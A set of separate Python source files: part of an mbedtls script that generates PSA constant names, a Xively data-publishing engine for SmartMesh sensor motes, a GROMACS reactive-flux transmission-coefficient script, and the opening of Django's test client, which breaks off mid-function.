# "#define" followed by a macro name with either no parameters
# or a single parameter and a non-empty expansion.
# Grab the macro name in group 1, the parameter name if any in group 2
# and the expansion in group 3.
_define_directive_re = re.compile(r'\s*#\s*define\s+(\w+)' +
r'(?:\s+|\((\w+)\)\s*)' +
r'(.+)')
_deprecated_definition_re = re.compile(r'\s*MBEDTLS_DEPRECATED')
def read_line(self, line):
"""Parse a C header line and record the PSA identifier it defines if any.
This function analyzes lines that start with "#define PSA_"
(up to non-significant whitespace) and skips all non-matching lines.
"""
# pylint: disable=too-many-branches
m = re.match(self._define_directive_re, line)
if not m:
return
name, parameter, expansion = m.groups()
expansion = re.sub(r'/\*.*?\*/|//.*', r' ', expansion)
if re.match(self._deprecated_definition_re, expansion):
# Skip deprecated values, which are assumed to be
# backward compatibility aliases that share
# numerical values with non-deprecated values.
return
if name.endswith('_FLAG') or name.endswith('MASK'):
# Macro only to build actual values
return
elif (name.startswith('PSA_ERROR_') or name == 'PSA_SUCCESS') \
and not parameter:
self.statuses.add(name)
elif name.startswith('PSA_KEY_TYPE_') and not parameter:
self.key_types.add(name)
elif name.startswith('PSA_KEY_TYPE_') and parameter == 'curve':
self.key_types_from_curve[name] = name[:13] + 'IS_' + name[13:]
elif name.startswith('PSA_KEY_TYPE_') and parameter == 'group':
self.key_types_from_group[name] = name[:13] + 'IS_' + name[13:]
elif name.startswith('PSA_ECC_FAMILY_') and not parameter:
self.ecc_curves.add(name)
elif name.startswith('PSA_DH_FAMILY_') and not parameter:
self.dh_groups.add(name)
elif name.startswith('PSA_ALG_') and not parameter:
if name in ['PSA_ALG_ECDSA_BASE',
'PSA_ALG_RSA_PKCS1V15_SIGN_BASE']:
# Ad hoc skipping of duplicate names for some numerical values
return
self.algorithms.add(name)
# Ad hoc detection of hash algorithms
if re.search(r'0x020000[0-9A-Fa-f]{2}', expansion):
self.hash_algorithms.add(name)
# Ad hoc detection of key agreement algorithms
if re.search(r'0x09[0-9A-Fa-f]{2}0000', expansion):
self.ka_algorithms.add(name)
elif name.startswith('PSA_ALG_') and parameter == 'hash_alg':
if name in ['PSA_ALG_DSA', 'PSA_ALG_ECDSA']:
# A naming irregularity
tester = name[:8] + 'IS_RANDOMIZED_' + name[8:]
else:
tester = name[:8] + 'IS_' + name[8:]
self.algorithms_from_hash[name] = tester
elif name.startswith('PSA_KEY_USAGE_') and not parameter:
self.key_usages.add(name)
else:
# Other macro without parameter
return
_nonascii_re = re.compile(rb'[^\x00-\x7f]+')
_continued_line_re = re.compile(rb'\\\r?\n\Z')
def read_file(self, header_file):
for line in header_file:
m = re.search(self._continued_line_re, line)
while m:
cont = next(header_file)
line = line[:m.start(0)] + cont
m = re.search(self._continued_line_re, line)
line = re.sub(self._nonascii_re, rb'', line).decode('ascii')
self.read_line(line)
@staticmethod
def _make_return_case(name):
return 'case %(name)s: return "%(name)s";' % {'name': name}
@staticmethod
def _make_append_case(name):
template = ('case %(name)s: '
'append(&buffer, buffer_size, &required_size, "%(name)s", %(length)d); '
'break;')
return template % {'name': name, 'length': len(name)}
@staticmethod
def _make_bit_test(var, flag):
return BIT_TEST_TEMPLATE % {'var': var,
'flag': flag,
'length': len(flag)}
def _make_status_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.statuses)))
def _make_ecc_curve_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.ecc_curves)))
def _make_dh_group_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.dh_groups)))
def _make_key_type_cases(self):
return '\n '.join(map(self._make_append_case,
sorted(self.key_types)))
@staticmethod
def _make_key_type_from_curve_code(builder, tester):
return KEY_TYPE_FROM_CURVE_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
@staticmethod
def _make_key_type_from_group_code(builder, tester):
return KEY_TYPE_FROM_GROUP_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
def _make_ecc_key_type_code(self):
d = self.key_types_from_curve
make = self._make_key_type_from_curve_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_dh_key_type_code(self):
d = self.key_types_from_group
make = self._make_key_type_from_group_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_hash_algorithm_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.hash_algorithms)))
def _make_ka_algorithm_cases(self):
return '\n '.join(map(self._make_return_case,
sorted(self.ka_algorithms)))
def _make_algorithm_cases(self):
return '\n '.join(map(self._make_append_case,
sorted(self.algorithms)))
@staticmethod
def _make_algorithm_from_hash_code(builder, tester):
return ALGORITHM_FROM_HASH_TEMPLATE % {'builder': builder,
'builder_length': len(builder),
'tester': tester}
def _make_algorithm_code(self):
d = self.algorithms_from_hash
make = self._make_algorithm_from_hash_code
return ''.join([make(k, d[k]) for k in sorted(d.keys())])
def _make_key_usage_code(self):
return '\n'.join([self._make_bit_test('usage', bit)
for bit in sorted(self.key_usages)])
def write_file(self, output_file):
"""Generate the pretty-printer function code from the gathered
constant definitions.
"""
data = {}
data['status_cases'] = self._make_status_cases()
data['ecc_curve_cases'] = self._make_ecc_curve_cases()
data['dh_group_cases'] = self._make_dh_group_cases()
data['key_type_cases'] = self._make_key_type_cases()
data['key_type_code'] = (self._make_ecc_key_type_code() +
self._make_dh_key_type_code())
data['hash_algorithm_cases'] = self._make_hash_algorithm_cases()
data['ka_algorithm_cases'] = self._make_ka_algorithm_cases()
data['algorithm_cases'] = self._make_algorithm_cases()
data['algorithm_code'] = self._make_algorithm_code()
data['key_usage_code'] = self._make_key_usage_code()
output_file.write(OUTPUT_TEMPLATE % data)
def generate_psa_constants(header_file_names, output_file_name):
collector = MacroCollector()
for header_file_name in header_file_names:
with open(header_file_name, 'rb') as header_file:
collector.read_file(header_file)
temp_file_name = output_file_name + '.tmp'
with open(temp_file_name, 'w') as output_file:
collector.write_file(output_file)
os.replace(temp_file_name, output_file_name)
if __name__ == '__main__':
if not os.path.isdir('programs') and os.path.isdir('../programs'):
os.chdir('..')
# Allow to change the directory where psa_constant_names_generated.c is written to.
OUTPUT_FILE_DIR = sys.argv[1] if len(sys.argv) == 2 else "programs/psa"
generate_psa_constants(['include/psa/crypto_values.h',
'include/psa/crypto_extra.h'],
OUTPUT_FILE_DIR + '/psa_constant_names_generated.c')
|
|
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
CHECKDELAY = 5 # in s, delay between verifying that there is so API key
def __init__(self):
# log
log.info('creating instance')
# store params
# local variables
self.connector = None
self.lastCheck = None
self.xivelyApiKey = None
self.subscribedMotes = []
self.statusLock = threading.Lock()
self.status = {}
self.status['apiKeySet'] = 'WAIT...'
self.status['status'] = 'DISCONNECTED'
self.status['numConnectionsOK'] = 0
self.status['numConnectionsFailed'] = 0
self.status['numSubscriptionsFailed'] = 0
self.status['lastConnected'] = None
self.status['lastDisconnected'] = None
self.status['numPublishedOK'] = 0
self.status['numPublishedFail'] = 0
# initialize parent class
EventBusClient.EventBusClient.__init__(self,
signal = 'newDataMirrored',
cb = self._publish,
teardown_cb = self._cleanup,
)
self.name = 'DataConnector_xivelyConnector'
# connect extra events
dispatcher.connect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
# add stats
#======================== public ==========================================
def getStatus(self):
with self.statusLock:
return copy.deepcopy(self.status)
#======================== private =========================================
def _cleanup(self):
# disconnect extra events
dispatcher.disconnect(
self.getStatus,
signal = 'xivelystatus',
weak = False,
)
def _publish(self,sender,signal,data):
now = time.time()
dld = DustLinkData.DustLinkData()
mac = data['mac']
#========== connect/disconnect
if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
# remember I just checked
self.lastCheck = now
# we need to use "raw" access because dld.getPublisherSettings()
# does not return all settings
settings = dld.get(['system','publishers','xively'])
# record the xivelyApiKey
xivelyApiKey = None
if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
xivelyApiKey = settings['xivelyApiKey']
# update status
if xivelyApiKey==None:
with self.statusLock:
self.status['apiKeySet'] = 'NO'
else:
with self.statusLock:
self.status['apiKeySet'] = 'YES'
# decide whether to connect/disconnect
if (not self.connector) and xivelyApiKey:
# connect
# log
log.info("Connecting to Xively")
# remember API key
self.xivelyApiKey = xivelyApiKey
# connect
try:
self.connector = xivelyConnector.xivelyConnector(
apiKey = self.xivelyApiKey,
productName = 'SmartMesh IP Starter Kit',
productDesc = 'Connecting using DustLink',
)
except Exception as err:
# log
log.error("Error while connecting to Xively: {0}".format(err))
# update status
with self.statusLock:
self.status['status'] = 'CONNECTION FAILED'
self.status['numConnectionsFailed']+= 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['status'] = 'CONNECTED'
self.status['numConnectionsOK'] += 1
self.status['lastConnected'] = dld.timestampToStringShort(now)
elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
# disconnect
self._disconnect()
#========== publish data
if self.connector:
try:
self.connector.publish(
mac = data['mac'],
datastream = data['type'],
value = data['lastvalue'],
)
except Exception as err:
# log
log.error(
"Error while publishing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
data['type'],
err,
)
)
# update status
with self.statusLock:
self.status['numPublishedFail'] += 1
# disconnect
self._disconnect()
else:
# update status
with self.statusLock:
self.status['numPublishedOK'] += 1
#========== subscribe
if self.connector:
if mac not in self.subscribedMotes:
try:
if ('subscribeToLed' in data) and (data['subscribeToLed']):
# create datastream
self.connector.publish(
mac = mac,
datastream = 'led',
value = 0,
)
# subscribe
self.connector.subscribe(
mac = mac,
datastream = 'led',
callback = self._led_cb,
)
except Exception as err:
# log
log.error(
"Error while subscribing to {0}/{1}: {2}".format(
FormatUtils.formatMacString(mac),
'led',
err,
)
)
# update status
with self.statusLock:
self.status['status'] = 'SUBSCRIPTION FAILED'
self.status['numSubscriptionsFailed'] += 1
# disconnect
self._disconnect()
else:
self.subscribedMotes += [mac]
def _disconnect(self):
now = time.time()
dld = DustLinkData.DustLinkData()
# log
log.info("Disconnecting from Xively")
# close connector
try:
self.connector.close()
except Exception:
pass # happens when no active subscription
# reset variables
self.connector = None
self.xivelyApiKey = None
self.subscribedMotes = []
# update status
with self.statusLock:
self.status['status'] = 'DISCONNECTED'
self.status['lastDisconnected'] = dld.timestampToStringShort(now)
def _led_cb(self,mac,datastream,value):
# all non-0 values turn LED on
if value==0:
value = 0
else:
value = 1
dispatcher.send(
signal = 'fieldsToMesh_OAPLED',
data = {
'mac': mac,
'fields': {
'status': value,
},
}
)
|
|
#!/afs/crc.nd.edu/x86_64_linux/python/3.4.0/gcc-4.8.0/bin/python3
''' reactive_flux.py - Calculates the normalized reactive flux, k(t),
from a set of GROMACS simulations started at the maximum of the
free energy barrier. Currently supports bimolecular reactions.
'''
import os
import numpy as np
import math
import sys
import time
def heavyside(arg, i=1, rdz=1):
if i == 0:
if rdz >= 0:
return 1.0
else:
return 0.0
if arg >= 0:
return 1.0
if arg < 0:
return 0.0
def list_divide(list1, list2):
final_list = []
for i in range(0, len(list1)):
if list2[i] == 0:
final_list.append(0)
else:
final_list.append(list1[i]/list2[i])
return final_list
def list_subtract(list1, list2):
final_list = []
for i in range(0, len(list1)):
final_list.append(list1[i] - list2[i])
return final_list
def minimage(x, y, z):
if x > boxx/2.0:
x -= boxx
elif x < -boxx/2.0:
x += boxx
if y > boxy/2.0:
y -= boxy
elif y < -boxy/2.0:
y += boxy
if z > boxz/2.0:
z -= boxz
elif z < -boxz/2.0:
z += boxz
return [x, y, z]
def covariance(A, B):
'''Calculates the covariance between two data sets.'''
# Calculate the mean of A and B, respectively
muA = np.mean(A)
muB = np.mean(B)
# Calculate covariance.
cov = 0
N = len(A)
for eA, eB in zip(A, B):
cov += ((eA-muA)*(eB-muB))/N
return cov
def chi(backwards, tsloc):
'''Checks if the backwards trajectory recrosses the TS.'''
chilist = []
recrossed = False
for value in backwards:
if recrossed == True:
chilist.append(0)
else:
this_dist = float(value.split()[1])
if this_dist > tsloc:
chilist.append(0)
recrossed = True
else:
chilist.append(1)
return chilist
# Check if we want a special RF function
runtype = ''
if len(sys.argv) == 2:
runtype = sys.argv[1]
print(runtype)
if len(sys.argv) == 3:
runtype = sys.argv[1]
print(runtype)
## Data structure initialization
num_frames = 600
num_simulations = 2000
ktnum = [0 for i in range(0, num_frames+1)]
ktnum2 = [0 for i in range(0, num_frames+1)]
ktden = [0 for i in range(0, num_frames+1)]
timelist = np.linspace(0.000, 3.000, num_frames).tolist()
lastnums = []
lastdens = []
# Get box size.
boxlines = open('1/nvt1.gro', 'r').readlines()
box = boxlines[-1].split()
boxx = float(box[0])
boxy = float(box[1])
boxz = float(box[2])
print("Detected box {0}, {1}, {2}".format(boxx, boxy, boxz))
tslocs = []
if runtype == '':
print("Calculating the Bennett-Chandler transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
for i in range(0,2):
if i == 0: # forwards
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
elif i == 1: # reverse
with open("{0}/distanceur.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancelr.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityur.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocitylr.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distfile = f.readlines()
# Get r
tsloc = float(distfile[15].split()[1])
tslocs.append(tsloc)
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
#print('New Rdotzero: {0}'.format(rdotzero))
#rdotzero = (distance2-tsloc)/0.005
#print('Old Rdotzero (finite difference): {0}'.format(rdotzero))
hs_rdotzero = heavyside(rdotzero)
# And loop over all distances:
i = 0
for line in distfile[15:]:
this_line = line.split()
distance = float(this_line[1])
hs_rt_ts_loc = heavyside(distance - tsloc, i, rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += (rdotzero*hs_rt_ts_loc)
ktden[i] += (rdotzero*hs_rdotzero)
i += 1
print("Analysis finished. Producing final reactive flux function, kbc(t).")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum, ktden)
print("Transmission Coefficient Estimate: {0}".format(np.mean(kt[-200:])))
print("Saving data.")
save_file = open("data", 'w')
for frame in range(0,num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
#with open('tcoeff', 'a') as tcfile:
# tcfile.write(str(np.mean(kt[-200:])))
# tcfile.write('\n')
if runtype == 'bc2':
print("Calculating the Bennett-Chandler 2 transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
# Check to see if the trajectory started at the right location.
# If so, extract rdot(0):
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
# And loop over all distances:
i = 0
for fline, bline in zip(distfile[15:], distrfile[15:]):
this_fline = fline.split()
fdistance = float(this_fline[1])
this_bline = bline.split()
bdistance = float(this_bline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
hs_lt_ts_loc = heavyside(tsloc - bdistance, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += rdotzero*hs_rt_ts_loc*hs_lt_ts_loc
ktden[i] += rdotzero*hs_rdotzero
i += 1
# Save last frame of numerator and denominator to a list
lastnums.append(rdotzero*hs_rt_ts_loc*hs_lt_ts_loc)
lastdens.append(rdotzero*hs_rdotzero)
print("Analysis finished. Producing final reactive flux function, kbc2(t).")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum, ktden)
# Calculate transmission coefficient (last frame)
tc = np.mean(kt[-1:])
# Calculate error bars
sigmaK = (((np.std(lastnums)/ktnum[-1])**2) + ((np.std(lastdens)/ktden[-1])**2)-2*covariance(lastnums, lastdens)/(ktnum[-1]*ktden[-1]))**(1/2)
sigmafile = open('sigma', 'w')
sigmafile.write(str(sigmaK))
sigmafile.close()
print("Transmission Coefficient Estimate: {0}".format(tc))
print("Saving data.")
save_file = open("databc2", 'w')
for frame in range(0,num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
num_file = open('databc2num', 'w')
for frame in range(0, num_frames-1):
num_file.write("{0} {1}\n".format(timelist[frame], ktnum[frame]))
num_file.close()
den_file = open('databc2den', 'w')
for frame in range(0, num_frames-1):
den_file.write("{0} {1}\n".format(timelist[frame], ktden[frame]))
den_file.close()
if runtype == 'pf':
print("Calculating the postive flux (PF) transmission coefficient.")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
# Check to see if the trajectory started at the right location.
# If so, extract rdot(0):
# Check to see if the trajectory started at the right location.
# If so, extract rdot(0):
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
chilist = chi(backwards, tsloc)
# And loop over all distances:
i = 0
for fline, bline in zip(distfile[15:], distrfile[15:]):
this_fline = fline.split()
fdistance = float(this_fline[1])
this_bline = bline.split()
bdistance = float(this_bline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
hs_lt_ts_loc = heavyside(bdistance - tsloc, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += (rdotzero*hs_rdotzero*hs_rt_ts_loc)
ktnum2[i] += (rdotzero*hs_rdotzero*hs_lt_ts_loc)
ktden[i] += (rdotzero*hs_rdotzero)
i += 1
print("Analysis finished. Producing final reactive flux function, kpf(t).")
# Produce k(t) from numerator and denominator lists
kt1 = list_divide(ktnum, ktden)
kt2 = list_divide(ktnum2, ktden)
kt = list_subtract(kt1, kt2)
print("Transmission Coefficient Estimate: {0}".format(np.mean(kt[-200:])))
print("Saving data.")
save_file = open("datapf", 'w')
for frame in range(0,num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
rdotzeros = []
if runtype == 'epf':
print("Calculating the transmission coefficient via the effective positive flux (EPF) algorithm [RECOMMENDED].")
for sim in range (1, num_simulations+1):
sys.stdout.write("\rAnalyzing simulation {0}/{1}...".format(sim, num_simulations))
sys.stdout.flush()
with open("{0}/distanceu.xvg".format(sim), "r") as f:
udistfile = f.readlines()
with open("{0}/distancel.xvg".format(sim), "r") as f:
ldistfile = f.readlines()
with open("{0}/velocityu.xvg".format(sim), "r") as f:
uvelofile = f.readlines()
with open("{0}/velocityl.xvg".format(sim), "r") as f:
lvelofile = f.readlines()
with open("{0}/dist.xvg".format(sim), "r") as f:
distfile = f.readlines()
with open("{0}/distr.xvg".format(sim), "r") as f:
distrfile = f.readlines()
# Check to see if the trajectory started at the right location.
# If so, extract rdot(0):
tsloc = float(distfile[15].split()[1])
# Get COM of U, L
UCOM = float(udistfile[24].split()[1]), float(udistfile[24].split()[2]), float(udistfile[24].split()[3])
LCOM = float(ldistfile[24].split()[1]), float(ldistfile[24].split()[2]), float(ldistfile[24].split()[3])
# Get COV of U, L
UCOV = float(uvelofile[24].split()[1]), float(uvelofile[24].split()[2]), float(uvelofile[24].split()[3])
LCOV = float(lvelofile[24].split()[1]), float(lvelofile[24].split()[2]), float(lvelofile[24].split()[3])
# Calculate dx, dy, dz
dx, dy, dz = minimage(UCOM[0]-LCOM[0], UCOM[1]-LCOM[1], UCOM[2]-LCOM[2])
# Calculate dvx, dvy, dvz
dvx = UCOV[0]-LCOV[0]
dvy = UCOV[1]-LCOV[1]
dvz = UCOV[2]-LCOV[2]
# Calculate rdotzero and its heaviside
rdotzero = (dx*dvx + dy*dvy + dz*dvz)/(dx**2+dy**2+dz**2)**0.5
hs_rdotzero = heavyside(rdotzero)
rdotzeros.append(rdotzero*hs_rdotzero)
# Calculate the CHI function. (see van erp paper/powerpoint)
chilist = chi(distrfile[15:], tsloc)
# And loop over all distances:
i = 0
for fline in distfile[15:]:
this_fline = fline.split()
fdistance = float(this_fline[1])
hs_rt_ts_loc = heavyside(fdistance - tsloc, i, rdz=rdotzero)
# Calculate k(t) for that frame, append to lists
ktnum[i] += rdotzero*hs_rdotzero*chilist[i]*hs_rt_ts_loc
ktden[i] += rdotzero*hs_rdotzero
i += 1
# Save last frame of numerator and denominator to a list
lastnums.append(rdotzero*hs_rdotzero*chilist[i-1]*hs_rt_ts_loc)
lastdens.append(rdotzero*hs_rdotzero)
print("Analysis finished.")
# Produce k(t) from numerator and denominator lists
kt = list_divide(ktnum,ktden)
# Calculate error bars
sigmaA = np.std(lastnums)
sigmaB = np.std(lastdens)
A = ktnum[-1]/num_simulations
B = ktden[-1]/num_simulations
print("A: {0}".format(A))
print("B: {0}".format(B))
print("sigA: {0}".format(sigmaA))
print("sigB: {0}".format(sigmaB))
sigmaK = kt[-1]*((sigmaA/A)**2 + (sigmaB/B)**2 - (2*covariance(lastnums,lastdens)/(A*B)))**(0.5)
sigmaK = sigmaK/(num_simulations**0.5)
sigmafile = open('sigma', 'w')
sigmafile.write(str(sigmaK))
sigmafile.close()
print("ERROR: {0}".format(sigmaK))
print("Transmission Coefficient: {0}".format(kt[-1]))
print("Saving data.")
save_file = open("transmissioncoefficient", 'w')
for frame in range(0, num_frames-1):
save_file.write("{0} {1}\n".format(timelist[frame], kt[frame]))
save_file.close()
print("wrote.")
print("AVERAGE rdotzerohsrdotzero: {0}".format(np.mean(rdotzeros)))
#num_file = open('databc2num', 'w')
#for frame in range(0, num_frames-1):
# num_file.write("{0} {1}\n".format(timelist[frame], ktnum[frame]))
#num_file.close()
#den_file = open('databc2den', 'w')
#for frame in range(0, num_frames-1):
# den_file.write("{0} {1}\n".format(timelist[frame], ktden[frame]))
#den_file.close()
|
|
from __future__ import unicode_literals
import sys
import os
import re
import mimetypes
from copy import copy
from io import BytesIO
from django.conf import settings
from django.contrib.auth import authenticate, login, logout, get_user_model
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest
from django.core.signals import (request_started, request_finished,
got_request_exception)
from django.db import close_old_connections
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.template import TemplateDoesNotExist
from django.test import signals
from django.utils.functional import curry
from django.utils.encoding import force_bytes, force_str
from django.utils.http import urlencode
from django.utils.importlib import import_module
from django.utils.itercompat import is_iterable
from django.utils import six
from django.utils.six.moves.urllib.parse import unquote, urlparse, urlsplit
from django.test.utils import ContextList
__all__ = ('Client', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
raise ValueError("Unable to write a payload after he's been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
class ClientHandler(BaseHandler):
"""
A HTTP Handler that can be used for testing purposes.
Uses the WSGI interface to compose requests, but returns
the raw HttpResponse object
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
from django.conf import settings
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
response = self.get_response(request)
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
store.setdefault('context', ContextList()).append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
is_file = lambda thing: hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
